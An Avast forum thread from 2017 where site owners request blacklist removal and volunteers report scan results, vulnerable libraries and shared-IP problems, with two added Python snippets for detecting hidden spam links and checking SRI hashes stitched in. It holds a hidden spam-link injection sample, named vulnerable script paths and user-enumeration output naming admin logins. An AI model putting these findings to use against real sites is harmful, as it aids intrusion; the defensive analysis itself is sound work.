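<p>Visit <a href="https://partner.example/">our partner</a> or <a href="/events">events</a>.</p>
<div style="overflow: hidden; height: 1px">
<a href="http://spam-one.example/cache/comprar-propecia">comprar propecia en farmacia</a><br>
<a href="http://spam-two.example/lib/x.php">cheap pills</a>
</div>
<p><a href="http://www.temple.example/contact">contact</a></p>
</body></html>"""

if __name__ == "__main__":
    for line, href, text, reasons in suspicious_links(SAMPLE_HTML, "temple.example"):
        print(f"line {line}: {href} --> '{text}' [{', '.join(reasons)}]")
```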
Title: Re: How to remove my website from your blacklist?
Post by: cropfast on February 23, 2017, 06:57:32 AM
Great list of blacklisting sites here, really helpful. Any suggestions for how to stop spam links and ransomware from being injected? Don't think I can be on the watch on all these sites all the time  :-\
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 23, 2017, 02:13:35 PM
Hi cropfast,

Best thing is to configure your server against this. Input output validation, proper configuration with security headers and sri hashes generated, abiding by the so-called "same origin" policy. Know that with known flaws PHP (for instance loader.php, cache.php) is the royal way in of SEO Spam injection. Have proper input output validation always.

Do not rely on the so-called SEO Spam solutions that particular firms may offer, their Black Hat methods often land you in a worse position than before you invited them to "help".

I find firehol blocking a very good solution, implement this when your systems allow for it to be installed.

polonus
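To make the "sri hashes" advice in the post above concrete, this added example (not from the thread) computes a Subresource Integrity value, verifies an integrity attribute the way a browser does by honouring only the strongest algorithm listed, and lists cross-origin scripts and stylesheets that carry no integrity attribute. Host names and file contents are constructed.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hash algorithms defined for SRI, weakest to strongest.
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(content, alg="sha384"):
    """Return the integrity value (alg-base64digest) for the given bytes."""
    digest = hashlib.new(alg, content).digest()
    return f"{alg}-{base64.b64encode(digest).decode()}"


def verify_integrity(metadata, content):
    """Check bytes against the value of an integrity attribute.

    Several hashes may be listed, separated by spaces. Only the hashes of
    the strongest algorithm present are considered; any one of them may match.
    """
    tokens = []
    for token in metadata.split():
        alg, sep, rest = token.partition("-")
        if sep and alg in STRENGTH:
            tokens.append((alg, rest.split("?", 1)[0]))  # drop ?options
    if not tokens:
        return True  # no usable metadata: the resource loads unchecked
    strongest = max(tokens, key=lambda t: STRENGTH[t[0]])[0]
    return any(sri_hash(content, alg) == f"{alg}-{value}"
               for alg, value in tokens if alg == strongest)


class ResourceAuditor(HTMLParser):
    """Collect cross-origin scripts and stylesheets lacking integrity."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.unprotected = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "script":
            url = attr.get("src")
        elif tag == "link" and "stylesheet" in (attr.get("rel") or "").lower().split():
            url = attr.get("href")
        else:
            return
        host = urlparse(url or "").hostname
        if host and host != self.site_host and not attr.get("integrity"):
            self.unprotected.append(url)


def unprotected_resources(html, site_host):
    auditor = ResourceAuditor(site_host)
    auditor.feed(html)
    auditor.close()
    return auditor.unprotected


# Constructed sample: file content and page markup are made up.
LIB = b"window.lib = 1;"
SAMPLE_PAGE = f"""<script src="/js/site.js"></script>
<script src="https://cdn-a.example/lib.js" integrity="{sri_hash(LIB)}" crossorigin="anonymous"></script>
<script src="//cdn-b.example/widget.js"></script>
<link rel="stylesheet" href="https://cdn-b.example/theme.css">"""

if __name__ == "__main__":
    print("integrity value:", sri_hash(LIB))
    print("unchanged file verifies:", verify_integrity(sri_hash(LIB), LIB))
    print("modified file verifies:", verify_integrity(sri_hash(LIB), LIB + b"x"))
    print("missing integrity:", unprotected_resources(SAMPLE_PAGE, "shop.example"))
```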
Title: Re: How to remove my website from your blacklist?
Post by: biaggi on March 03, 2017, 12:48:15 PM
Hi, avast is blocking entry to our sites, how to solve this?
tvoje-zahrada[.]cz
tvojezahrada[.]cz
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 03, 2017, 12:56:59 PM
tvoje-zahrada[.]cz was blocked due to spreading Locky malware in November 2016. I am removing it from blacklist now ;)
Title: Re: How to remove my website from your blacklist?
Post by: biaggi on March 03, 2017, 01:04:55 PM
Yes, we had some phishing attacks but the whole server was cleaned and the site engine upgraded to the latest version in November. Could you please check whether our other sites that are on this server are blocked:
rizar[.]cz
rizar-vaky[.]sk
kidsplanet[.]cz
fatso[.]cz
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 03, 2017, 01:10:31 PM
rizar[.]cz
rizar-vaky[.]sk
kidsplanet[.]cz
fatso[.]cz
None of these are blocked 8)
Title: Re: How to remove my website from your blacklist?
Post by: François37 on March 08, 2017, 04:27:20 PM
Hi Honzaz,

My e-commerce website has been blacklisted by Avast for two days; I cannot access it if I don't deactivate the agents.

I have performed many scans, including VirusTotal, and nothing has been found.

Could you remove it from black list now please?

hxtps://andriphone.com/
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on March 08, 2017, 04:38:16 PM
Please don't post live links to sites that are detected.
Post the virus total link.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on March 08, 2017, 04:47:20 PM
Enormous amount of domains on same IP and many are blacklisted

IP history  >>  https://virustotal.com/en/ip-address/128.65.195.66/information/
click more button under list(s) for more info, you may need to click several times



Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 08, 2017, 05:12:41 PM
This was unfortunately a false positive; I am removing the domain from our blacklist now ;)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 08, 2017, 05:41:31 PM
@bob3160,

With all the IP's they use, you'd have a hard  look to detect what VT scan to start first: at  least HonzaZ broke that URL.  :)
To see what I am on about go here and give the IP addresses in at urlquery dot net scan for instance.

What you asked for was not very possible to come up with, due to the circumstances and configurations.
Re: https://www.virustotal.com/nl/domain/andriphone.com/information/

Not everybody of those that come here for assistance is aware of the necessity to break links that appear here.

The IP -31.170.167.206 for instance hosts a lot of so-called fake domains, and it is a pity that CloudFlare turns a blind eye as CDN to what it all transports, and that is why they often also host a gigantic amount of connections for abusers of all sorts.
It is not making our tasks easier.  ;)

Damian
Title: Re: How to remove my website from your blacklist?
Post by: François37 on March 08, 2017, 06:21:03 PM
"Not everybody of those that come here for assistance is aware of the necessity to break links that appear here."

So how can I achieve this?  8)

Thanks for the removal!
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on March 08, 2017, 06:24:05 PM
@HonzaZ has done it for you


Title: Re: How to remove my website from your blacklist?
Post by: François37 on March 08, 2017, 06:59:28 PM
Thanks for your professionalism!
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 09, 2017, 09:49:22 AM
8)

Funny story - up until recently, us moderators couldn't modify others' posts. We could split the topic, remove the message, issue a warning to the user (only did this once), or outright ban the user (fortunately never had to), but modifying messages was not allowed :D
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:30:48 AM
You're moving up the ranks ;D
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on March 09, 2017, 07:44:36 PM
It was one of the items discussed in Prague. This must be the affirmative action Avast decided to take to make more people available to make those kinds of changes. :)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 09, 2017, 07:57:56 PM
I do not think it has to do with ranks or responsibility - as I said, I could remove posts or ban users before - I think it was merely a misconfiguration :)
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on March 09, 2017, 08:24:04 PM
Quote
I do not think it has to do with ranks or responsibility - as I said, I could remove posts or ban users before - I think it was merely a misconfiguration :)
I hope not. :)
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 10:06:41 PM
Hi there guys. Please help me. My website memoryblocks.co.za all of a sudden tonight got blacklisted. I am sure my site is clean. Please assist in whitelisting me again. Sorry to trouble.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:09:44 PM
What do you mean with again?
It is your first post here ;)

Did you run the (online) scans to see what could be the reason?

Here is already a very good reason for the blacklisting :
https://www.virustotal.com/en/ip-address/129.232.209.19/information/

And here is another one :
http://zulu.zscaler.com/submission/show/0bc79277f7f9840efacc553bd1055cad-1489093962
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 10:15:37 PM
Sorry about again... No, never happened before. Wow... thank you for coming back to me so quickly. Please explain how I do online scan
Thank you for your trouble
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:25:32 PM
Quote
Please explain how I do online scan
That part is easy.
Use one of the many sites that can scan websites/IPs.

Depending on your knowledge, the hard part can be understanding the results they give.

I have several online scanners for this (and other things) listed on one of my simple websites ( http://www.ache.nl )

If you look at posts from Polonus and me on this webboard, you will see which one we mostly use.

Just something you need to take care of:
http://retire.insecurity.today/#!/scan/2b3ff6de9173917e7aa49cadbf48a9166db665a10c79e7ed141f77760e8e46b8

As you are running a commercial website, I strongly advise to get dedicated hosting on a secure server.
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 10:36:58 PM
Thank you for the help. Do you know of anyone who can do this for me? And how much will it be. Midnight in South Africa...will check in tomorrow. Thank you for the kindness in trying to assist
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:39:41 PM
Doing what ?
Getting dedicated hosting ?
Any decent host can provide it.
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 10:43:23 PM
No Eddy...getting me off the blacklist. I just did a scan with virustotal and it came out clean. I really don't understand this
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:48:58 PM
Virustotal does not scan websites, it checks blacklists.

Unless avast has detected something I don't know, it is likely an IP ban.

Ask avast to check your website.
If found clean (as I suspect), they will allow your domain.
But please follow my advice on the dedicated hosting.
With that many blacklistings on that ASN, it can easily be that your domain gets blacklisted again very soon and not only by avast.

[in Afrikaans] now it is bedtime for you ;)
(I had a girlfriend who was born in your country)
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 10:52:30 PM
That's amazing Afrikaans...lol Where are you from? Speaking Afrikaans. How do I report this to Avast? And are you saying that I am not on a dedicated host?
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 09, 2017, 10:55:14 PM
No, dedicated host means that you have your own IP.
Now you are sharing the IP with a lot of other sites and that is likely the cause of the problem.

[in Afrikaans] I am from the Netherlands
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 09, 2017, 11:04:24 PM
Ahhh I understand...Nederland...very nice. Let me see if I manage to report to Avast. Thank you so much. Thank you very much
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 10, 2017, 12:10:00 AM
[in Dutch] Hi there Niel3,

I also come from Holland, just like Eddy, and from the part from which Jan van Riebeeck left for South Africa.

I hear that the braaivleis over there gets better every year, and now the websites too. I will explain it a bit... in English, because this is the English section of the forums, and not in Dutch or Afrikaans. So here we go.

Look here: update your Word Press version: WordPress Version
4.7.3
Version does not appear to be latest 4.7.2 - update now.
Your WordPress Version is OK, seems there is a bug in the hackertarget scanner.

Are these plug-ins not left by their developers? elementor-pro & gp-premium?

Retirable code: Detected libraries:
jquery-migrate - 1.4.1 : -http://memoryblocks.co.za/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
jquery - 1.12.4 : (active1) -http://memoryblocks.co.za/wp-includes/js/jquery/jquery.js?ver=1.12.4
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
1 vulnerable library detected

Two stylesheets to have a look at: https://sritest.io/#report/3f5adeca-27a8-4d8a-8946-ca3e1ca67ea9

See recommendations here: https://observatory.mozilla.org/analyze.html?host=memoryblocks.co.za

Yours,

polonus aka Damiaan
Title: Re: How to remove my website from your blacklist?
Post by: Niel3 on March 10, 2017, 09:17:47 AM
 ;D ;D ;D Heheheh You must come and visit here in Africa
Thank you....I will try that. You guys are very kind.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 10, 2017, 09:19:04 AM
memoryblocks.co.za was indeed blocked because the whole IP (129.232.209.19) was blocked. I suggest getting a dedicated host, but in the meantime I am unblocking the IP ;)
Title: Re: How to remove my website from your blacklist?
Post by: untukmakluman on March 22, 2017, 08:08:44 AM
Hi

Please unblock my site, it's called areload.com

Before this my site DNS was hosted on afraid.org and now I've moved to another DNS server. I've scanned my site using the given links on the first page, all came out clean.

I've also requested for Google to review my site and Google has emailed me that my site is clean as well

Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on March 22, 2017, 08:58:34 AM
Hi, areload.com has been removed from blacklist
Title: Re: How to remove my website from your blacklist?
Post by: untukmakluman on March 23, 2017, 05:00:36 AM
Thank you LukasJ
Title: Re: How to remove my website from your blacklist?
Post by: mash13 on March 23, 2017, 03:11:33 PM
Our site is also the victim of a false positive. Could you please remove it?

mybroadband.co.za
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 23, 2017, 03:26:18 PM
mybroadband.co.za has been removed from our blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: mash13 on March 23, 2017, 04:07:28 PM
Thank you very much. Is there a way we can prevent this from happening in the future?

I've noticed only our homepage (https://mybroadband.co.za/news), but no other pages, is still receiving alerts. Could there be a reason for that?
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 24, 2017, 09:22:15 AM
Quote
Is there a way we can prevent this from happening in the future?
Blocking and unblocking URLs is such a complex process that it is almost impossible to "whitelist" whole domains. However, I can say that if a URL is unblocked, there is a much lower chance of it being blocked automatically again.

Quote
I've noticed only our homepage (https://mybroadband.co.za/news), but no other pages, is still receiving alerts. Could there be a reason for that?
None of your pages should be receiving alerts since I unblocked it yesterday.
Title: Re: How to remove my website from your blacklist?
Post by: estelle.courdoisy on March 24, 2017, 10:56:41 AM
Hello,

The domain from my client has the same problem, ziad.info can you please remove it from blacklist, it's a new website now.

Thanks
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 24, 2017, 11:00:35 AM
ziad.info removed from blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: estelle.courdoisy on March 24, 2017, 11:22:06 AM
Thanks !
Title: Re: How to remove my website from your blacklist?
Post by: Area on April 27, 2017, 02:35:58 PM
Hi,

Our site is also the victim of a false positive. Could you please remove it?

envialosimple.com

*.envialosimple.com

Regards,

Emanuel.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 27, 2017, 02:45:04 PM
It is not a false positive.

I need a larger screen to see all the blacklistings on that IP
https://www.virustotal.com/en/ip-address/200.58.122.63/information/
http://urlquery.net/report.php?id=1493294697097

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/16af19c00905df360dc26ebd4c6a5e86fd950739f0cd8002215b159a0037733b

Area,
fix the vulnerable libraries and get dedicated hosting.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 27, 2017, 03:01:51 PM
As Eddy has stated, there is certainly some code to be mitigated:

htxp://envialosimple.com/en/index.html
Detected libraries:
jPlayer - 2.6.0 : (active1) -http://envialosimple.com/js/jquery.jplayer.min.js
jquery - 1.10.2 : (active1) -http://envialosimple.com/js/libraries.js
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
jquery.prettyPhoto - 3.1.5 : (active1) -http://envialosimple.com/js/libraries.js
Info: Severity: high
https://github.com/scaron/prettyphoto/issues/149
https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
jquery-ui-dialog - 1.10.3 : (active1) -http://envialosimple.com/en/index.html
jquery-ui-autocomplete - 1.10.3 : (active1) -http://envialosimple.com/en/index.html
jquery-ui-tooltip - 1.10.3 : (active1) -http://envialosimple.com/en/index.html
(active) - the library was also found to be active by running code
2 vulnerable libraries detected

DOM XSS sources and sinks galore: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fenvialosimple.com%2Fen%2Findex.html

Issue with googleadservice script SRI-hash generation lacking: https://sritest.io/#report/948ddcb3-5470-48c9-bcf7-47abc4d0d1d4

F-status and recommended change: https://observatory.mozilla.org/analyze.html?host=envialosimple.com

More insecurity on that Rosario racks: https://www.threatcrowd.org/ip.php?ip=200.58.122.63

For a final verdict or an exclusion to the general IP block, wait for a reaction from an Avast Team Member,
as we are just volunteers with relevant knowledge, but we cannot unblock.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on April 27, 2017, 03:18:05 PM
I do not see any detection on envialosimple[.]com, can you post a printscreen?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 27, 2017, 04:07:44 PM
Here I see vulnerability for data bind injection exploit in knockout-3.0.0.js code.
This for envialosimple.dattatec dot com, it resides in /js/79/knockout-3.0.0.js
See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fenvialosimple.dattatec.com
-> Results from scanning URL: htxp://envialosimple.dattatec.com/js/79/knockout.validation.js
Number of sources found: 17
Number of sinks found: 14
Also htxp://envialosimple.dattatec.com/js/79/jquery.numberformatter.js seems open to a javascript injection attack.
See the instances of return eval( etc.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 29, 2017, 01:03:34 PM
VirusTotal doesn't scan sites.
Next to that, VirusTotal does show a blacklisting for that site and a huge amount for that IP.
https://www.virustotal.com/en/url/1ae53e24426a38c1ebdce690d942e3ec6d470d3077fd99af6c097e5c1ea49258/analysis/1493463206/
https://www.virustotal.com/en/ip-address/104.31.16.3/information/

There is also the 301 (moved permanently) problem.

Likely links to blacklisted domains, browser difference :
https://www.websicherheit.at/website-malware-viren-scanner/?url=rnbxclusive.me

Blacklisted :
http://www.urlvoid.com/scan/rnbxclusive.me/

Infected :
https://sitecheck.sucuri.net/results/rnbxclusive.me

Malicious :
https://quttera.com/detailed_report/rnbxclusive.me

Blacklistings :
http://urlquery.net/report.php?id=1493461091139

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User                    Login
1   rnbx_admin           rnbx_admin
2   Rnbxclusive_admin   rnbxclusive_admin

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/c1eddaacee4bedef45475b9be01ac777da5c49de704dd2854bc3dd234f97e66a

Other problems :
http://www.domxssscanner.com/scan?url=http://rnbxclusive.me
Title: Re: How to remove my website from your blacklist?
Post by: gediminas5 on May 12, 2017, 01:12:34 PM
Hello, I need your help with arp[.]lt, this site is blacklisted by avast antivirus. Is there any way to fix this problem? It doesn't contain any virus or malicious programs.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on May 12, 2017, 01:17:23 PM
Quote
Hello, I need your help with hxxp://www.arp.lt/ this site is blacklisted by avast antivirus. Is there any way to fix this problem? It doesn't contain any virus or malicious programs.
-> https://sitecheck.sucuri.net/results/www.arp.lt/
-> http://zulu.zscaler.com/submission/show/11afe3c22833d95b7530c79fe8d66f0d-1494587644

You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 12, 2017, 01:29:11 PM
Links to suspended domain :
https://www.websicherheit.at/website-malware-viren-scanner/?url=arp.lt

Blacklisted by Norton :
https://sitecheck.sucuri.net/results/arp.lt

Blacklistings :
https://www.virustotal.com/en/url/8bc39ba7bf1800a643227bdfed0a9f98259efe8a64ea36cdd245686ff5e6835a/analysis/1494588124/
https://www.virustotal.com/en/ip-address/79.98.25.107/information/
http://urlquery.net/report.php?id=1494586012134

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/7eeedd6ab4b030e539af879bee89b9f185f7de957a6f9c1e0c23c448b2cb1b5f
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on May 13, 2017, 07:26:38 PM
Hi, arp site was removed from blacklist yesterday.

Lukáš
Title: Re: How to remove my website from your blacklist?
Post by: ss77892 on May 16, 2017, 04:57:39 PM
Hi,
Could you please check why fun4dog.ru is blacklisted? https://sitecheck.sucuri.net/results/fun4dog.ru shows no problem.
Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on May 16, 2017, 05:07:07 PM
Quote
Hi,
Could you please check why fun4dog.ru is blacklisted? https://sitecheck.sucuri.net/results/fun4dog.ru shows no problem.
Thanks!
Blacklisted
https://virustotal.com/nb/url/84711d1640005d5fe3908093c0003926e6f3520c9d5ec65f570a1e574e8618fb/analysis/1494947160/

and also hosted at afraid.org > see info from @Milos here
https://forum.avast.com/index.php?topic=164970.msg1175650#msg1175650




Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 16, 2017, 05:41:57 PM
Site is 60/100% suspicious: http://zulu.zscaler.com/seen/cf860dc6eecb3fb0b51caf45fc23d053-1494947171
See F-status here: https://observatory.mozilla.org/analyze.html?host=fun4dog.ru
Retirable code: http://retire.insecurity.today/#!/scan/68507bce3c5b955b190c54908d92787eb94f26d3e387b7631d5fa51c7dacd536
See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Ffun4dog.ru
Same origin policy seems well been maintained.
Steer away from afraid dot org and avast team member may reconsider... http://toolbar.netcraft.com/site_report?url=+http%3A%2F%2Ffun4dog.ru%2F

Consider: http://www.domxssscanner.com/scan?url=http%3A%2F%2Ffun4dog.ru

polonus
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 16, 2017, 05:55:37 PM
Considering -http://fun4dog.ru/wa-content/js/jquery-plugins/jquery.retina.min.js?v1.7.1

Just some error in this code
Quote
found JavaScript
     error: undefined variable jQuery
     error: undefined variable c.fn
     error: line:1: SyntaxError: missing ; before statement:
          error: line:1: var c.fn = 1;
          error: line:1: ....^
There is availability in this code, but it may not be defined properly (pol) and issue with natroute?

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: karcsi1978 on May 16, 2017, 11:05:43 PM
Hi!

Please help me.
My personal site [ kovacskaroly[.]hu/szakdolgozat ] is blacklisted by Avast.

I checked it with the following tools:
https://www.virustotal.com/hu/url/4116de84dccf7a3203f1c94d19080ae0a9eb10b4960e10ed1e6627a2fdf3405e/analysis/1494967866/
http://zulu.zscaler.com/submission/show/53c8086da4cf249f15d0e970b945d810-1494967932
http://www.urlvoid.com/scan/kovacskaroly.hu/
https://sitecheck.sucuri.net/results/kovacskaroly.hu/szakdolgozat

I do not see / did not find any infections. But I replaced all files with originals and replaced the database and login passwords.

Why does this site appear in the blacklist?
Could anyone please help to remove my site from the blacklist?
This site is very important for me, because I use this site for my DIPLOMA WORK!

Thank you!
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 16, 2017, 11:09:37 PM
Neither we nor avast care what a site is used for.
For us it is about security.

Blacklisted :
https://www.virustotal.com/en/ip-address/91.82.117.199/information/
https://www.virustotal.com/en/file/77795c8a3c5a8ff8129cb4db828828c53a590f93583fcfb0b1112a4e670c97d4/analysis/
http://urlquery.net/report.php?id=1494967001776
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 17, 2017, 10:53:52 AM
Re fun4dog[.]ru - it is indeed because of DNS hijack. Change DNS hosting / use stealth (paid) account at afraid.org and get back to us for unblocking.
Re kovacskaroly[.]hu/szakdolgozat - Google (which means Chrome and Firefox) blocks it: https://www.google.com/transparencyreport/safebrowsing/diagnostic/index.html#url=kovacskaroly.hu/szakdolgozat
Title: Re: How to remove my website from your blacklist?
Post by: ss77892 on May 17, 2017, 07:05:09 PM
Quote
Re fun4dog[.]ru - it is indeed because of DNS hijack. Change DNS hosting / use stealth (paid) account at afraid.org and get back to us for unblocking.
Changed DNS :
Name servers listed at parent: ns3-l2.nic.ru,ns4-cloud.nic.ru,ns4-l2.nic.ru,ns8-cloud.nic.ru,ns8-l2.nic.ru
Name servers listed at child: ns3-l2.nic.ru,ns4-cloud.nic.ru,ns4-l2.nic.ru,ns8-cloud.nic.ru,ns8-l2.nic.ru
Title: Re: How to remove my website from your blacklist?
Post by: Mylan2 on May 18, 2017, 05:51:32 AM
Hello,
Please remove the block on my website
rynantech[.]com
rynantechnologies[.]com
rynansmartfertilizers[.]com
rynanagrifoods[.]com
Our website is all clear when checked on
https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

Thanks,
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on May 18, 2017, 05:55:10 AM
You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Mylan2 on May 18, 2017, 06:00:00 AM
Quote
You can report a URL here: https://www.avast.com/report-a-url.php
Thank you for the swift response, the first time they had blocked my site, recently they blocked it again.  :'(
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on May 18, 2017, 06:18:37 AM
You're welcome.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 18, 2017, 09:05:05 AM
Quote
Re fun4dog[.]ru - it is indeed because of DNS hijack. Change DNS hosting / use stealth (paid) account at afraid.org and get back to us for unblocking.
Changed DNS :
Name servers listed at parent: ns3-l2.nic.ru,ns4-cloud.nic.ru,ns4-l2.nic.ru,ns8-cloud.nic.ru,ns8-l2.nic.ru
Name servers listed at child: ns3-l2.nic.ru,ns4-cloud.nic.ru,ns4-l2.nic.ru,ns8-cloud.nic.ru,ns8-l2.nic.ru
I have removed fun4dog[.]ru from our blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 18, 2017, 09:07:18 AM
Quote
Please remove the block on my website
rynantech[.]com
rynantechnologies[.]com
rynansmartfertilizers[.]com
rynanagrifoods[.]com
I have removed rynantech[.]com from our blacklist. The other URLs were never blocked.
Title: Re: How to remove my website from your blacklist?
Post by: Mylan2 on May 18, 2017, 09:55:02 AM
Quote
Please remove the block on my website
rynantech[.]com
rynantechnologies[.]com
rynansmartfertilizers[.]com
rynanagrifoods[.]com
I have removed rynantech[.]com from our blacklist. The other URLs were never blocked.

Thank you HonzaZ  ;D
Title: Re: How to remove my website from your blacklist?
Post by: marsramirez on May 20, 2017, 02:31:18 AM
My customers that use a PC with Avast! Antivirus installed with Avast Online Security addon/extensions are experiencing problems while trying to access my website: boudikacomics[.]com

I've already run the following tests for my website and everything looks fine:
https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com
http://freedns.afraid.org/

I've tested my site on a PC with Avast installed and the following error message appears:
t=27452 [st= 2]      DELEGATE_INFO  [dt=1]
 --> delegate_blocked_by = "extensión Avast Online Security"

I need you to remove my website from your blacklist as I'm losing a lot of potential customers.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 20, 2017, 02:42:17 AM
I have removed boudikacomics[.]com from our blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: marsramirez on May 20, 2017, 03:07:17 AM
Quote
I have removed boudikacomics[.]com from our blacklist ;)

Thanks a lot.
Title: Re: How to remove my website from your blacklist?
Post by: virosss on May 31, 2017, 05:29:51 AM
I have the same problem. We bought a new domain which is already in the avast blacklist and we receive an alert message when trying to open it. Checked the website with all possible tools and the website is clean. Tried to report a false positive, but no answer... and the alerts continue.

Anybody from Avast Team can help with this issue?

The domain is i-money(.)net(.)ua
Title: Re: How to remove my website from your blacklist?
Post by: bauerj on May 31, 2017, 09:09:23 AM
Hi, I have removed i-money(.)net(.)ua from our blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: virosss on May 31, 2017, 12:34:11 PM
Quote
Hi, I have removed i-money(.)net(.)ua from our blacklist.

Thanks ;)
Title: Re: How to remove my website from your blacklist?
Post by: tmjw321 on May 31, 2017, 10:23:49 PM
Hi.  I would like my website removed from your blacklist.  heyguyscomedy[.]com   
Not sure why it's blocking users from going there.  I ran several checks and verified it's clean using the following sites:

https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 31, 2017, 10:37:30 PM
Blacklisted by McAfee :
http://www.siteadvisor.com/sites/heyguyscomedy.com
https://sitecheck.sucuri.net/results/heyguyscomedy.com

Blacklistings on that ASN :
http://urlquery.net/report.php?id=1496260482598

Two vulnerable libraries detected :
http://retire.insecurity.today/#!/scan/b9b92bbf825b807192446f2a36530c5de622c83b212216c35e3b25d049762f87
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 02, 2017, 09:25:12 AM
Blacklisted for spreading malware: heyguyscomedy[.]com/d4jnwkc6ue.php
Hopefully it has been cleaned already, so I am unblocking it ;)
Title: Re: How to remove my website from your blacklist?
Post by: Kelemen on June 13, 2017, 01:05:18 PM
Hi, it was recently brought to my attention that my site kel.mn is blocked by Avast, including all the possible subdomains.

I have checked the domain using all the available online tools which were unable to find any malicious files there.

Can my domain be removed from your blacklist please?

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 13, 2017, 02:02:53 PM
You have some security issues with your CMS:
WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

email-subscribers 3.2.9   latest release (3.3) Update required
http://www.icegram.com/
contact-form-7 4.7   latest release (4.8) Update required
https://contactform7.com/
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

One jQuery library to be retired: http://retire.insecurity.today/#!/scan/fb2da25eae9ced5cfe5bbfb003dde551b1c6e3e311047136a01abb017fe07a1e

C+ status here: https://observatory.mozilla.org/analyze.html?host=kel.mn  see: recommendations.

DNS issues with CloudFlare: http://www.dnsinspect.com/kel.mn/10127457

Just wait for an Avast Team Member to come up with a verdict, and tell us why it has been blocked.
I think it is the use of problematic -zoho.mail, categorization vulnerabilities, but let's wait and see.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Kelemen on June 13, 2017, 02:10:36 PM
Quote
You have some security issues with your CMS:
WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

